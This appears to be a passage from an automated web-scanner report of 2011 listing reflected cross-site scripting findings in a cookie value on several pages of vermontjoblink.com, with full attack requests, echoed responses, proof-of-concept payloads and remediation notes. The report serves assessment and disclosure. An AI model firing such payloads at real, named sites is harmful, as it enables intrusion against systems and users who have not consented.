HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN54E5B";ALERT(1)//093651F14F0\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9e7"><img%20src%3da%20onerror%3dalert(1)>3b3bc65ba7a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as da9e7"><img src=a onerror=alert(1)>3b3bc65ba7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enda9e7"><img%20src%3da%20onerror%3dalert(1)>3b3bc65ba7a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:38 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enda9e7"><img src=a onerror=alert(1)>3b3bc65ba7a"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26637"><img%20src%3da%20onerror%3dalert(1)>1d500488022 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 26637"><img src=a onerror=alert(1)>1d500488022 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en26637"><img%20src%3da%20onerror%3dalert(1)>1d500488022; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:38 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en26637"><img src=a onerror=alert(1)>1d500488022"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9b46"%3balert(1)//306a24f14a3 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e9b46";alert(1)//306a24f14a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene9b46"%3balert(1)//306a24f14a3; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENE9B46";ALERT(1)//306A24F14A3\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855f5"><img%20src%3da%20onerror%3dalert(1)>7bed8c41200 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 855f5"><img src=a onerror=alert(1)>7bed8c41200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en855f5"><img%20src%3da%20onerror%3dalert(1)>7bed8c41200; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en855f5"><img src=a onerror=alert(1)>7bed8c41200"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ec58"%3balert(1)//809999d932e was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6ec58";alert(1)//809999d932e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en6ec58"%3balert(1)//809999d932e; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:31 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6EC58";ALERT(1)//809999D932E\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 206dd"%3balert(1)//d34d3e0b702 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 206dd";alert(1)//d34d3e0b702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en206dd"%3balert(1)//d34d3e0b702; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN206DD";ALERT(1)//D34D3E0B702\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0fe3"><img%20src%3da%20onerror%3dalert(1)>116f633914f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e0fe3"><img src=a onerror=alert(1)>116f633914f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene0fe3"><img%20src%3da%20onerror%3dalert(1)>116f633914f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene0fe3"><img src=a onerror=alert(1)>116f633914f"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7915"%3balert(1)//5a2f3f874b0 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as a7915";alert(1)//5a2f3f874b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ena7915"%3balert(1)//5a2f3f874b0; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:27 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
